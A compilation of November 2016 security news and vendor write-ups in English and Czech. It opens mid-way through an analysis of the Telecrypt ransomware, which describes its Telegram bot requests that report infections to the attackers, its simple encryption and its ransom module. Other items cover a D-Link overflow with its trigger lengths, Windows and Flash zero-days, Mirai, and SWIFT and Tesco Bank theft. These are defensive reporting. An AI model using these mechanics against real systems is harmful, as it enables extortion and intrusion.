The Trojan sends the next request using the method ‘sendMessage’ which allows the bot to send messages to the chat thread of the specified number. The Trojan then uses the chat number hardwired into its body, and sends an “infection successful” report to its creators:<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>

The Trojan sends the following parameters in the request:

<chat> – number of the chat with the cybercriminal;

<computer_name> – name of the infected computer;

<infection_id> – infection ID;

<key_seed> – number used as a basis to generate the file encryption key.

After sending the information, the Trojan searches the hard drives for files with specific extensions, and encrypts them bytewise, using the simple algorithm of adding each file byte to the key bytes.


File extensions selected for encryption

Depending on its configuration, the Trojan may add the extension ‘.Xcri’ to the encrypted files, or leave the extension unchanged. The Trojan’s sample that we analyzed does not change file extensions. A list of encrypted files is saved to the text file ‘%USERPROFILE%\Desktop\База зашифр файлов.txt’.

After encryption, the Trojan sends the request<token>/sendmessage?chat_id=<chat>&text=<computer_name>_<infection_id>_<key_seed>stop.

In this request, all parameters are the same as in the previous request, but the word ‘stop’ is added at the end.

Then the Trojan downloads the extra module Xhelp.exe (URL: http://***.ru/wp-includes/random_compat/Xhelp.exe) from a compromised site created using WordPress, and launches it. This module, called “Informer” (‘Информатор’ in the original Russian) by the cybercriminals, has a graphical interface and informs the victim about what has happened, and puts forward the ransom demand. The ransom is 5,000 RUB which is accepted via Qiwi or Yandex.Money payment methods.


Screens demonstrated to the victim user

The victim can communicate with the cybercriminals via a dedicated entry field in the “Informer” interface. This feature is also based on sending a Telegram message using the method ‘sendMessage’.

Multiple language mistakes in the ransom texts suggest the grade level of the Trojan’s creators. There is also a final phrase which catches the attention: “Thank you for helping Young Programmers Fund”.

Safeguarding measures

All Kaspersky Lab products detect this threat with the following verdicts:



3e24d064025ec20d6a8e8bae1d19ecdb – Trojan-Ransom.Win32.Telecrypt.a (the main module)
14d4bc13a12f8243383756de92529d6d – Trojan-Ransom.Win32.Telecrypt.a (the ‘Informer’ module).

If you have fallen victim to this encryption malware, we strongly advise you not to pay the ransom. Instead, contact Kaspersky Lab’s support team and we will help you decrypt your files.

SWIFT Hack: Bangladesh Bank Recovers $15 Million from a Philippines Casino
10.11.2016 thehackernews Hacking
Part of the $81 Million stolen from Bangladesh bank's New York Federal Reserve account earlier this year in the wake of the major malware attack on the SWIFT interbank transfer network has been tracked down to a casino in the Philippines.
SWIFT, or Society for Worldwide Interbank Telecommunication, is a global financial messaging system that thousands of banks and organizations around the world use to transfer billions of dollars every day.
In February, hackers dropped a piece of malware on a SWIFT terminal employed by Bangladesh's central bank, obtained credentials needed for payment transfers from the New York Federal Reserve Bank, and then transferred large amount to fraudulent accounts based in the Philippines and Sri Lanka.
In March, the investigation revealed that the stolen money was then sold to a black market foreign exchange broker and later transferred to at least 3 local casinos in the Philippines.
In September, Philippine court ordered the return of $15 Million surrendered by a junket operator at Solaire Resort & Casino to Bangladesh Bank, reports Reuters.
On Monday, a team of Bangladesh central bank arrived in Manila to take back its $15 Million of the $81 Million stolen funds surrendered by Chinese-born Kim Sin Wong, casino's junket operator of Eastern Hawaii Leisure Company.
Wong, who returned $4.63 Million and 488.28 Million pesos (around $10.05 Million) to Philippine authorities, said the stolen money came from two Chinese high-rollers, Gao Shu Hua from Beijing and Ding Zhi Ze from Macau.
However, Wong denied any role in one of the world's biggest bank heists.
The recovered $15 Million amount is now secure in the vaults of the Philippine central bank, said Bangladesh's Ambassador to the Philippines John Gomes, adding that there's more to come.
"The writ of execution that the money be handed back to Bangladesh has already been done by the court," Gomes told Reuters. "The good thing is now that the process on this $15 Million is more or less completed, we will go for the rest."
Bangladesh was not the first bank which became the victim of SWIFT malware. This year, some unknown hackers targeted banks across the world by gaining access to SWIFT that is being used to transfer Billions of dollars every day.
Investigators also revealed that the malware used in the Bangladesh cyber heist was almost identical to one used to infiltrate banks in Ecuador, Vietnam, and the Philippines.

CVE-2016-7165 Privilege Escalation flaw affects many Siemens solutions
10.11.2016 securityaffairs Vulnerebility
Siemens released security updates and temporary fixes to fix a privilege escalation flaw, tracked CVE-2016-7165, that affects several industrial products.
Siemens has released security updates and temporary fixes to address a privilege escalation vulnerability, tracked CVE-2016-7165, that affects several industrial products.

The flaw could be exploited by attackers to escalate their privileges if the flawed products are not installed under the default path.

Users with local access to the Windows system running on the same device as affected Siemens applications can escalate their privileges under certain conditions.

“Unquoted service paths could allow local Microsoft Windows operating system users to escalate their privileges if the affected products are not installed under their default path (“C:\Program Files\*” or the localized equivalent),” reads the advisories published by both Siemens and ICS-CERT.

CVE-2016-7165 simatic-wincc

The privilege escalation vulnerability flaw was reported to Siemens by WATERSURE and KIANDRA IT.

The products affected by this vulnerability are widely adopted by many organizations, the impact of its exploitation depends on each specific implementation.

The CVE-2016-7165 flaw affects several products, including Siemens SCADA systems, distributed control systems (DCS). It also affects engineering tools and simulators such as SIMATIC, SINEMA, TeleControl, SOFTNET, SIMIT, Security Configuration Tool (SCT) and Primary Setup Tool (PST) products.

The updates released by Siemens work only for some products, for other systems the company suggested to apply temporary fixes.

In October, the US ICS-CERT has published its annual vulnerability coordination report for the fiscal year 2015. The report included detailed information about security vulnerabilities reported to the US ICS-CERT in 2015.

“ICS-CERT is pleased to announce the release of the NCCIC/ICS-CERT FY 2015 Annual Vulnerability Coordination Report. This report provides a summary of the DHS NCCIC/ICS-CERT vulnerability coordination activities for FY 2015. A link to the full document can be found on the ICS-CERT web site ICS-CERT Info Products web page.” reported the ICS-CERT.

According to the annual vulnerability coordination report, the overall number of security flaws disclosed by the US ICS-CERT is 427, meanwhile, in 2014 the number of vulnerabilities was 245.

This means that the number of flaws disclosed by the US ICS-CERT has increased by 74 percent.

SCADA Sssh! Don’t Talk, Filter it
10.11.2016 securityaffairs Attack

The effects of cyber-attacks against SCADA/ICS are well known, however, there is a great confusion when dealing with mitigation techniques.
The Majority are aware of the impact cyber-attacks can have on Industrial Control Systems however, the reality in terms of mitigation techniques are shrouded with confusion and a reactive approach. Recent 0-day vulnerability dubbed as ‘Panel Shock’ found in Schneider Electric’s SCADA Human Machine Interface (HMI) device panels send ripples of fear and doubts in the industry; somehow dirty linen has been exposed again.

The media generally refer to all Industrial Control Architectures as SCADA and to avoid autocratic debates with various security voice groups we will continue this trend. It is not difficult to map the behavior classification of SCADA attack patterns by observing recent campaigns such as Havex, Black Energy and Stuxnet etc. In these attacks, the malware was mostly distributed by Phishing attacks aimed at executives not on the ICS network and Watering hole attacks on ICS vendor software delivery websites.

Assessing the Threat

No golden rules exist of how to assess the threat, however, the question that is queried most is ‘where do organizations initiate to assess the threat’? Within RSA Advanced Cyber Defence Practice we follow the domains/ framework to assess and formulate responses to ICS/SCADA threats.


In our forthcoming blog with Gareth Pritchard (Advanced Cyber Defence Consultant EMEA) and Peter Tran (Snr Director Advanced Cyber Defense at RSA blog site will be a detailed analysis on each domain.

For today’s article, I want to focus on the element of ‘filtering the white noise ‘

One of the core failures of SCADA-based organizations is their inability to filter white noise by dissecting incidents through the combination of hunting, intelligence gathering, and incident attribution. They fail to build a ‘proactive’ customized Use Case library that is required to detect specific and tailored threats targeted at the company. One of the suggested strategies could be a hunt and response strategy i.e.


1) Develop: UseCase Development Strategy

Initial UseCase development. Create tailored use cases from theory, practice and experience to detect the top; imminent, perceived or previously detected threats affecting the company. For example ICS – UseCase #1 “Unusual/Unplanned OPC Scan”, ICS – UseCase#2 “Suspected C2 communication”, IDS via Emerging Threats
i Analysts respond to the alerts generated from the new Use Cases.
ii Intelligence teams add context and if possible attribution to the detected threats.
iii Content Engineering teams tune use cases from analysis, attribution and context.
Analysts respond to the alerts generated from the tuned Use Cases.
Engineering and Intelligence: Detect & Collect threat data to support additional UseCase development
Develop tailored metrics / reports to detect current threats based on real world network data.

i) Report 1: Critical Anomaly

Develop metric reports to display anomalous traffic patterns occurring on critical systems via whitelisting expected traffic and displaying the remaining traffic from these devices on a pre-developed reporting template.
Collect log, packet and net-flow data for 30 days, analyses and condense the report data into a data analysis and metric report in order to highlight and add context to suspected suspicious traffic patterns.
Present and discuss the findings in a meeting with the administrators and engineers of the monitored critical systems to assist in identifying the suspicious, anomalous traffic which may be used to develop additional UseCases. (Fringe benefit = Engage and seed relationships with infrastructure teams, especially those related to critical systems)
Investigate and consolidate threat Intel from perceived anomalous traffic and create custom use cases from this data along with perceived attack scenarios.
3) Hunt: Implement Hunting Development process.

i Hunters find new threats on the network and raise incidents for investigation.
ii Intelligence teams add context and if possible attribution to the detected threats.
iii Content Engineering teams create use cases from the newly acquired indicators.
Analysts respond to the alerts generated from the new Use Cases.
iv Intelligence teams add context and if possible attribution to the detected threats.
v Content Engineering teams tune use cases from analysis, attribution and context.
Analysts respond to the alerts generated from the tuned Use Cases.
4) Enhance: Review UseCase Library

Analyse reports number of times each UseCase has triggered alongside the appearance of indicators present in the logic of the UseCases. Determine if the UseCases are erroneous or no longer valid.

Submit report to the Content management team to repair erroneous UseCases and archive UseCases which are no longer useful or relevant to the SOC.

Removal of unnecessary defunct, UseCases will assist in keeping the UseCase library current and in line with the current threat landscape and also assist production appliance optimisation and good maintenance.
Respond: Optimize and Advance roles
i Expand Hunting and Attribution capabilities to include dark net operations.
ii Expand L2 analyst capabilities to include malware analysis and basic remote forensic collection and analysis of forensic images.
iii Expand L1 analyst capabilities to triage, analysis, response and closure of low priority incidents.
Enhance: Management reporting and Success factors
Conduct 6 monthly reviews to gage success, knowledge gaps and training requirements.

Run 6 monthly and annual reports highlighting costs saved as a direct or indirect result of breach prevention and breach disruption. Use this data to qualify funding in order to enhance and Advance the SOC via analyst training, appliance upgrades and user awareness events.

The above process is only one step towards the development of mitigation process for ICS environment. Organizations need to avoid siloes working compartment and not in my backyard mentality to develop a more robust holistic process. See RSA blog next week for framework analysis.

Kdo zaútočil na klienty Tesco Bank? A nepřipravuje se něco podobného i v Česku?

10.11.2016 SecurityWorld Hacking
Za únik peněz z účtů dvaceti tisíc klientů Tesco Bank je podle všeho zodpovědný škodlivý kód, který se vydává za objednávku, fakturu nebo podobný dokument v e-mailu.

„Výsledkem infekce je, že škodlivý kód Retefe, který jsme detekovali, modifikuje stránku internetového bankovnictví, jež se zobrazuje klientovi banky v jeho prohlížeči, následně se pokouší sbírat přihlašovací údaje oběti,“ říká Miroslav Dvořák, technický ředitel Esetu.

„V některých případech ho naláká i na to, aby na své mobilní zařízení nainstaloval mobilní kompomentu tohoto škodlivého kódu, kterou detekujeme jako Android/Spy.Banker.EZ,“ dodává Dvořák.

Podle britských médií tímto způsobem unikly finance z účtů dvaceti tisíc klientů Tesco Bank. Instituce zároveň pozastavila všechny on-line transakce 140 tisícům zákazníků.

Malware Retefe dokáže modifikovat stránky internetového bankovnictví ve všech hlavních webových prohlížečích, včetně Google Chrome, Mozilla Firefox a Internet Exploreru. Eset upozorňuje, že klienti Tesco Bank nemusí být jediným cílem útočníků.

Autoři škodlivého kódu se zaměřili i na klienty dalších bank v Británii a německy hovořících zemích. Tyto banky aktuálně kontaktuje Eset s varováním o hrozbě, která jejich klienty může připravit o peníze.

Eset má podle svých slov podklady k analýze kódu Retefe díky aktivnímu monitoringu škodlivých kódů pomocí služby Threat Intelligence. Ta je v současnosti dostupná v České republice a na Slovensku. V nejbližších měsících ji společnost prý spustí i v jiných zemích světa.

Microsoft Patches Windows Zero-Day Flaw Disclosed by Google
10.11.2016 thehackernews Vulnerebility
Microsoft was very upset with Google last week when its Threat Analysis Group publically disclosed a critical Windows kernel vulnerability (CVE-2016-7255) that had yet to be patched.
The company criticized Google's move, claiming that the disclosure of the vulnerability, which was being exploited in the wild, put its customers "at potential risk."
The vulnerability affects all Windows versions from Windows Vista through current versions of Windows 10, and Microsoft was set to issue a fix come this month's Patch Tuesday.
So, as part of its monthly Patch Tuesday, Microsoft today patched the security flaw in Windows that was actively being exploited by hackers.
According to Microsoft's security bulletin released today, any hacker who tricked victims into running a "specially-crafted application" could successfully exploit the system bug and gain the ability to "install programs; view, change, or delete data; or create new accounts with full user rights."
Once exploited, the bug could be used to escape the sandbox protection and execute malicious code on the compromised Windows machine.
Rated as "important," the vulnerability was being exploited by Strontium group, also known as Fancy Bear, Sofacy, and APT 28, in targeted attacks.
Fancy Bear is the same group of hackers that has also been accused by the US Intelligence community of hacking the Democratic National Committee, Clinton Campaign Chair John Podesta, and former Secretary of State Colin Powell, among others.
Besides this controversial flaw exposed by Google last week, the security bulletin also fixes multiple elevation of privilege bugs.
Patch Tuesday also contains several critical security patches that affect all versions of Windows as well as other important updates and fixes for both Internet Explorer and Edge.
So, I strongly recommend home users and companies to ensure that their Windows PC is up-to-date with all of Microsoft's latest security fixes as of today.

Populární přehrávač Flash Player je děravý. Opět

9.11.2016 Novinky/Bezpečnost Zranitelnosti
Hned několik bezpečnostních chyb bylo nalezeno v programu Flash Player. Společnost Adobe, která za touto populární aplikací pro přehrávání internetových videí stojí, již vydala pro všechny trhliny záplaty. Uživatelé by s ohledem na možná rizika neměli s jejich instalací otálet.
Hned několik bezpečnostních oprav vydávala společnost Adobe v minulém týdnu. Tehdy se počítačoví piráti mohli prostřednictvím objevených chyb dostat do napadeného stroje a spustit na něm libovolný škodlivý kód. 

V praxi stejnou paseku mohou kyberzločinci nadělat i s využitím nově objevených chyb, na které upozornil Národní bezpečnostní tým CSIRT.CZ.

Jak již bylo zmíněno výše, opravy jsou však již k dispozici. „Nově uvolněné bezpečnostní záplaty pro Flash Player opravují několik závažných zranitelností umožňujících spuštění libovolného kódu,“ potvrdil Pavel Bašta, bezpečnostní analytik týmu CSIRT.CZ, který je provozován sdružením CZ.NIC.

To jinými slovy znamená, že s využitím chyb mohou piráti propašovat do cizího počítače prakticky jakýkoli virus.

Další várka oprav po týdnu
Společnost Adobe je s ohledem na aktuální hrozbu nucena vydávat další várku aktualizací pouhý týden poté, co byly opraveny předchozí trhliny.

I když se situace může zdát alarmující, je to dáno tím, že Flash Player je velmi populární. Tento přehrávač videí na internetu používají po celém světě desítky miliónů lidí. Právě proto se na něj velmi často zaměřují kyberzločinci.

Stahovat záplatu je možné prostřednictvím automatických aktualizací daného programu nebo prostřednictvím stránek společnosti Adobe.

DDoS Attack Takes Down Central Heating System Amidst Winter In Finland
9.11.2016 thehackernews Attack
Just Imaging — What if, you enter into your home from a chilling weather outside, and the heating system fails to work because of a cyber attack, leaving you in the sense of panic?
The same happened late last month when an attack knocks heating system offline in Finland.
Last week, a Distributed Denial of Service (DDoS) attack led to the disruption of the heating systems for at least two housing blocks in the city of Lappeenranta, literally leaving their residents in subzero weather.
Both the apartments are managed by a company called Valtia, a facilities services company headquartered in Lappeenranta.
Valtia CEO Simo Rounela confirmed to English language news outlet that the central heating system and hot water system in both buildings had become a target of DDoS attacks.
In an attempt to fight back the cyber attacks, which lived for a short time, the automated systems rebooted — and unfortunately got stuck in an endless loop, which restarted repeatedly and eventually shut down heating systems for more than a week.
Also Read: Someone is Using Mirai Botnet to Shut Down Internet for an Entire Country.
The incident is extremely worrying because in a location as cold as Finland – where temperatures at this time month are below freezing – taking heating systems offline for over a week could result in death, particularly with old-aged people.
Fortunately for the buildings' residents, it was not that cold in Lappeenranta.
The attack started in late October and ended on 3rd November afternoon. Here's what a brief post on the company's website reads:
"Over 90 percent of the [remote systems] in the area of terraced houses or larger buildings will not send an alarm at the moment, even if the heat is switched off or radiator pressure disappears," as the systems are designed to shut down for safety. "The systems must be actively monitored and adjusted."
According to another local media outlet, Helsingin Sanomat, Valtia quickly relocated those affected systems and switched the heating systems over to manual, while the company addressed the DDoS attacks and brought the control systems "back into the grid, this time from behind a firewall."
The report attributes the cyber attack to the Mirai botnet – the same infamous IoT botnet that caused vast internet outage over two weeks ago by launching massive DDoS attacks against DNS provider Dyn.
Dangerous Threats of Massive IoT Botnets
Mirai botnet malware scans for insecure IoT devices, like security cameras, DVRs, and routers, that uses their default passwords and then enslaves them into a botnet network, which is then used to launch DDoS attacks.
The latest incident isn't a disastrous situation, but it is enough to make it crystal clear that these Internet-connected systems can cause a significant consequence in our physical world as well.
Just imagine if these control systems can not be manually adjusted by the people who truly rely on them?
In this case, any cyber attack that knocks these systems down is potentially dangerous and even deadly in the event of extreme temperatures.
This incident once again highlights the dangerous threats of massive DDoS attacks, which are now emerging from Millions of insecure Internet of Things (IoT) devices, whereby attackers can simply launch a DDoS to take down any critical service – no need to infect it with malware or viruses.
So the best way to protect your smart devices from being a part of DDoS botnet is to be more vigilant about the security of your internet-connected devices.
Popular Deals From Our Store

Over 300,000 Android Devices Hacked Using Chrome Browser Vulnerability
9.11.2016 thehackernews Android
A vulnerability in Chrome for Android is actively being exploited in the wild that allows hackers to quietly download banking trojan apps (.apk) onto victim's’ device without their confirmation.
You might have encountered a pop-up advertisement that appears out of nowhere and surprise you that your mobile device has been infected with a dangerous virus and instructs you to install a security app to remove it immediately.
This malicious advertising web page automatically downloads an Android app installation (.apk) file to your device without requiring any approval.
Citing malware threats on your mobile device, attackers trick you to change your device's settings to allow installation of the third-party apps from stores other than Google Play Store and install the banking trojan app on your device.
Kaspersky researchers Mikhail Kuzin and Nikita Buchka discovered one such widespread malicious advertising campaign across Russian news sites and popular websites.
Since this August, the Trojan has infected over 318,000 Android devices across the world — thanks to Google AdSense advertisements that was being abused to spread malicious mobile banking trojan, dubbed Svpeng.
"When an APK file is broken down into pieces and handed over to the save function via Blob() class, there is no check for the type of the content being saved, so the browser saves the APK file without notifying the user," the duo explains in a blog post.
Google has acknowledged the issue, blocked the malicious ads and planned to patch it, although it is unclear when the next Android Chrome version will be released.
However, if Google sticks to its six-week release cycle, users can expect an update on 3rd December 2016. So, malicious actors have over three weeks to exploit the flaw.
"[The] next time they (criminals) push their adverts on AdSense they may well choose to attack users in other countries; we have seen similar cases in the past; After all, what could be more convenient than exploiting the most popular advertising platform to download their malicious creations to hundreds of thousands of mobile devices?" the pair say.
Even if the Google patch this issue with its next software update, attackers still have an evergreen technique to trick users into downloading malicious apps by exploiting vulnerabilities in popular websites.
For example, a recently disclosed XSS (Cross-Site Scripting) flaw, discovered by Indian security researcher Jitendra Jaiswal, on WhatsApp's official websites could allow attackers to trick users into downloading malware applications.
So, it is always a good idea to install apps from official Google Play Store as well as not to change default Android settings that prevent the installation of third-party apps.
So, the best recommendation for users is to think twice before installing any app (no matter how legitimate it looks) from untrusted sources or clicking on suspicious-looking links.

What does a DDoS with everyday life? DDoS knocks out building control systems in Finland
9.11.2016 securityaffairs Attack
The residents in two apartment buildings Finland faced more that a week of serious problem due to a DDoS attack that targeted the building control systems.
What does a DDoS with everyday life? The recent attack against the Dyn DNS service powered by an IoT botnet demonstrated the weakness of modern society to cyber threats.

Anyway, to better explain this strong dependency to a no tech-savvy it could be useful to share the news that I’m going to tell you.

The residents in two apartment buildings in Lappeenranta, Finland, had faced more that a week of serious problem due to a DDoS attack that targeted the building control systems.

The cyber attack targeted the building management systems and halted the heating distribution. The systems were isolated from the Internet and the systems went into an endless loop of reboot attempts trying to reestablish a normal situation.

“A Distributed Denial of Service (DDoS) attack halted heating distribution at least in two properties in the city of Lappeenranta, located in eastern Finland. In both of the events the attacks disabled the computers that were controlling heating in the buildings.” reported the news outlet

The equipment that was targeted in the attack was built by the company Fidelix whom representative Antti Koskinen confirmed other similar attacks hit systems in the country.

building control systems ddos

The apartments are managed by a company called Valtia, Simo Rounela, CEO of the company told Etelä-Saimaa the DDoS attack hit the building management systems.

I believe that we cannot underestimate such kind of incidents, building management systems are an easy target for cyber criminals and hackers. It is quite easy to locate Web-based HMI/SCADA for building automation and other systems for the building control that are exposed online. Searching engines like Shodan and Censys allow locating online any kind of computer systems providing to the attackers useful information to power a cyber attack.

In many cases, building control systems are not properly configured and there aren’t specific measures in place to protect them.

Consider also that it is very easy and cheap to power a DDoS attack today, the criminal underground is plenty of actors that offer DDoS botnet for rent and any other kind of booter software.

The Valtia company published an official announcement to confirm the attack and highlighted that the risks for such kind of attacks in the area.

“The local newspaper Etelä-Saimaa was a story last week, a denial of service attack on the real estate automation systems.

Similar attacks are easy to fend off a firewall or any other security solution. In this case, the possible attacks to stop and the actual control system continues to operate normally. the existing systems behind a firewall does not even tend to attack, so the situation will improve in that respect.” says Valtia.

At the same time discussions had commented that the reason why sys systems must be connected to the network at all? Here are a couple examples of customer:

-. Alarms
Over 90% of the area of terraced houses or larger buildings will not send an alarm at the moment, even if the heat is switched off or radiator pressure disappears. In this case, the damage will increase, repair time will increase and costs rise

– Management.
The systems must be actively monitored and adjusted. Some of this work can be done via a computer remotely, such as temperature setpoints and ventilation controls. In still must still happen, but rarely. This brings direct savings in costs and speed up considerably the work. Sometimes the destination can not be more than 100 kilometers from the maintenance office”

The incident highlights the importance of the proper management of building control systems with particular concern for their cyber security. These systems have to be properly configured and their software continually upgraded in order to fix security vulnerabilities discovered across their lifecycle.

“Building maintenance specialist Sami Orasaari confirms that building automation security is often neglected. Many housing companies or private owners do now want to invest in network firewalls and that security in general tends to be lax. In this case the devices targeted were attacked because they’ve been found to be vulnerable and the attackers have scanned network to find more of them.” reported the

“The cause of the issues were not apparent to regular maintenance task, because they have little or no training related to network attacks against the systems they routinely operate. The attack comes following a series of attacks done using so-called Internet of Things (IoT) devices.”

CVE-2016-6563 RCE flaw affects D-Link Routers, disable remote admin
9.11.2016 securityaffairs Vulnerebility
Carnegie-Mellon CERT warns of a flawed implementation of HNAP in D-Link routers (CVE-2016-6563) that could be exploited for remote execute code.
According to the Carnegie-Mellon CERT the implementation of the Home Network Automation Protocol (HNAP) of D-Link routers is affected by a stack-based buffer overflow vulnerability tracked as CVE-2016-6563.

The flaw could be exploited by a remote, unauthenticated attacker to execute arbitrary code with root privileges.

“Processing malformed SOAP messages when performing the HNAP Login action causes a buffer overflow in the stack. The vulnerable XML fields within the SOAP body are: Action, Username, LoginPassword, and Captcha”, the advisory states.”, reads the advisory.

The D-Link routers affected by the CVE-2016-6563 flaw belonging to the DIR family are:

CVE-2016-6563 d-link-rourer-dir-895l

According to the Carnegie-Mellon CERT, D-Link hasn’t fixed the problem, the only workaround is to disable remote administration.

The bad news is the availability of a Metasploit proof-of-concept exploit code published by the security expert Pedro Ribeiro from Agile Information Security.

Ribeiro explained that the issue it caused by fields accepting arbitrarily long string that are copied into the stack.

“Several Dlink routers contain a pre-authentication stack buffer overflow vulnerability, which is exposed on the LAN interface on port 80. This vulnerability affects the HNAP SOAP protocol, which accepts arbitrarily long strings into certain XML parameters and then copies them into the stack. This exploit has been tested on the real devices DIR-818LW and 868L (rev. B), and it was tested using emulation on the DIR-822, 823, 880, 885, 890 and 895. Others might be affected, and this vulnerability is present in both MIPS and ARM devices.” is the description of the CVE-2016-6563 vulnerabilities provided by Ribeiro “The MIPS devices are powered by Lextra RLX processors, which are crippled MIPS cores lacking a few load and store instructions. Because of this the payloads have to be sent unencoded, which can cause them to fail, although the bind shell seems to work well. For the ARM devices, the inline reverse tcp seems to work best. Check the reference links to see the vulnerable firmware versions.”

Ribeiro discovered two methods to trigger the vulnerability, passing to a vulnerable field a string longer than 3096 bytes or overrunning the stack of the calling function, hnap_main, with 2048+ bytes.

This isn’t the first time that experts find a flaw in the D-link implementation of the HNAP, many years ago experts at SourceSec Security Research discovered similar issues in the service.

Adobe issued security patches for 9 Flash Player flaws reported via ZDI
9.11.2016 securityaffairs Vulnerebility
Adobe released security updates that address nine vulnerabilities in Flash Player that could be exploited for remote code execution.
Adobe has released security updates to address one vulnerability in Connect for Windows and nine arbitrary code execution flaws in the Flash Player product.
The patches issued by the company for Adobe Flash Player are available for Windows, Macintosh, Linux and Chrome OS. An attacker can exploit the critical vulnerabilities to take full control of the vulnerable system.

“Adobe has released security updates for Adobe Flash Player for Windows, Macintosh, Linux and Chrome OS. These updates address critical vulnerabilities that could potentially allow an attacker to take control of the affected system.” reads the description published by Adobe.

Flash Player for Windows, Mac and web browsers, and Flash Player for Linux resolve type confusion and use-after-free vulnerabilities tracked as CVE-2016-7857, CVE-2016-7858, CVE-2016-7859, CVE-2016-7860, CVE-2016-7861, CVE-2016-7862, CVE-2016-7863, CVE-2016-7864 and CVE-2016-7865.
All the flaws fixed with this last round of security patches have been reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI). The vulnerabilities have been reported by several security experts, including bo13oy of CloverSec Labs, Archer, Kiritou Kureha, Erisaka Mafuyu, Onoe Serika, Kuchiki Toko and Takanashi Rikka.

adobe flash player update 2

The flaw in the Connect update that was reported by Vulnerability Lab is an input validation vulnerability in the events registration module. The flaw can be exploited for cross-site scripting (XSS) attacks.

The Connect 9.5.7 release fixes security vulnerabilities in versions 9.5.6 and earlier for Windows.

Adobe said there was no evidence that any of these vulnerabilities had been exploited in the wild.

Recently Adobe fixed a Flash Player vulnerability, tracked as, CVE-2016-7855, that was exploited by the Russian Fancy Bear APT in targeted attacks.

The vulnerability is a use-after-free issue that can be triggered by attackers for arbitrary code execution.

Microsoft patches CVE-2016-7255 Windows zero-day exploited by Fancy Bear
9.11.2016 securityaffairs Vulnerebility
Microsoft has issued a security patch that fixes the zero-day vulnerability tracked as CVE-2016-7255 exploited by Russian hackers.
Microsoft has issued security patches that fixed also the zero-day vulnerability exploited by Russian hackers.

One of the zero-days tracked as CVE-2016-7255 has been patched in the MS16-135 bulletin that also addresses two information disclosure and three privilege escalation vulnerabilities. The zero-day was exploited by attackers to gain administrator-level access by escaping the sandbox protection and execute malicious code.

Google has chosen to public disclose the flaw just 10 days after privately reporting it to Microsoft, giving the company a very little time to issue security updates.

According to Google, the reason for going public without waiting for a patch is that its experts have observed exploits for the flaw in the wild.

Microsoft criticized the Google decision because the disclosure potentially puts customers at risk.

“We believe in coordinated vulnerability disclosure, and today’s disclosure by Google puts customers at potential risk,” a Microsoft spokesperson said in a statement. “Windows is the only platform with a customer commitment to investigate reported security issues and proactively update impacted devices as soon as possible. We recommend customers use Windows 10 and the Microsoft Edge browser for the best protection.”

According to Microsoft, the CVE-2016-7255 vulnerability had been exploited in a limited number of spear-phishing attacks powered by the Russian hacker group known as Pawn Storm, APT28, Fancy Bear, Sofacy, Sednit, and Tsar Team.

Russian hackers also exploited a zero-day flaw (CVE-2016-7855) in Flash Player that Adobe promptly patched by issuing and an emergency patch.

According to the security advisory issued by Adobe, the CVE-2016-7855 has been exploited in targeted attacks. The vulnerability is a use-after-free issue that can be triggered by attackers for arbitrary code execution.


The last Microsoft Patch Tuesday include a critical security bulletin MS16-132 that addresses several issues related to the Windows Media Foundation, the Windows Animation Manager and OpenType fonts.

The bulletin MS16-132 also fixed the remote code execution vulnerability (CVE-2016-7256) that according to Microsoft has been exploited in the wild via specially crafted websites or documents that victims must open in order to trigger the exploit.

The bulletin MS16-129 fixed other vulnerabilities, a browser information disclosure vulnerability (CVE-2016-7199) and the Edge spoofing flaw (CVE-2016-7209)

The complete list of Microsoft Security Bulletins for November 2016 is available here:

Adobe also issued security patches for 9 Flash Player flaws reported via ZDI.

The company has released security updates to address one vulnerability in Connect for Windows and nine arbitrary code execution flaws in the Flash Player product.

Ransomware nepřestává strašit, počet obětí vyděračských virů roste

8.11.2016 Novinky/Bezpečnost Viry
Vyděračské viry pojmenované souhrnným označením ransomware představují pro uživatele stále větší riziko. Ve třetím čtvrtletí letošního roku se počet obětí těchto škodlivých kódů dokonce výrazně zvýšil. Vyplývá to z analýzy antivirové společnosti Kaspersky Lab.
Jak probíhá útok vyděračského viru?

Útoky vyděračských virů probíhají prakticky vždy na chlup stejně. Nejprve zašifrují záškodníci všechna data uložená na pevném disku. Za jejich zpřístupnění pak útočníci požadují výkupné, a to klidně i několik tisíc korun.
Kyberzločinci se zpravidla snaží v majiteli napadeného stroje vzbudit dojem, že se ke svým souborům dostane po zaplacení pokuty. Ta byla údajně vyměřena za používání nelegálního softwaru apod. I proto jim celá řada lidí již výkupné zaplatila.
Ani po zaplacení výkupného se ale uživatelé ke svým datům nedostanou. Místo placení výkupného je totiž nutné virus z počítače odinstalovat. Zpřístupnit nezálohovaná data je už ale ve většině případů nemožné.
Počet obětí vyděračských virů vzrostl ve třetím kvartálu 2,6krát. To jinými slovy znamená, že za zmiňované tři měsíce se obětí stalo více než 821 tisíc lidí z různých koutů světa.

Poškození nejčastěji pocházejí z Japonska (4,83 %), Chorvatska (3,71 %), Jižní Koreje (3,36 %) Tuniska (3,22 %) a Bulharska (3,2 %). V předchozím kvartále bylo na prvním místě také Japonsko, ale druhé, třetí a čtvrté místo bylo obsazeno Itálií, Džibutskem a Lucemburskem.

Jaké množství z poškozených uživatelů představují Češi, analýza neuvádí.

Nejčastěji se šíří CTB-Locker
Nejvíce počítačoví piráti šíří vyděračský virus zvaný CTB-Locker, který je zodpovědný za téměř třetinu všech uskutečněných útoků (28,34 %). Ten zašifruje data uložená na pevném disku a za jejich odemčení požaduje výkupné v bitcoinech, v přepočtu jde o téměř 50 tisíc korun.

Sluší se připomenout, že výkupné by ale lidé neměli platit, protože nemají žádné záruky, že data budou skutečně zpřístupněna. Z podobných případů, které se objevovaly v minulosti, dokonce vyplývá, že nedochází k odšifrování dat prakticky nikdy. Jediným řešením je počítač odvirovat.

To platí i pro další dva vyděračské viry, které se umístily v čele žebříčku. Druhý ve třetím čtvrtletí skončil škodlivý kód Locky (9,6 %) a třetí CryptXXX (8,95 %).

Vyděračských virů jsou desetitisíce
Vyděračských virů je ale samozřejmě daleko více. „Krypto ransomware zůstává i nadále jednou z největších hrozeb jak pro koncové uživatele, tak i firmy. Současný skokový nárůst v počtu napadených uživatelů může být způsoben tím, že jsme oproti předchozímu čtvrtletí zaznamenali třiapůlkrát více modifikací ransomwaru – celkem více než 32 000 různých forem,“ podotkl Fedor Sinitsyn, expert na ransomware ve společnosti Kaspersky Lab.

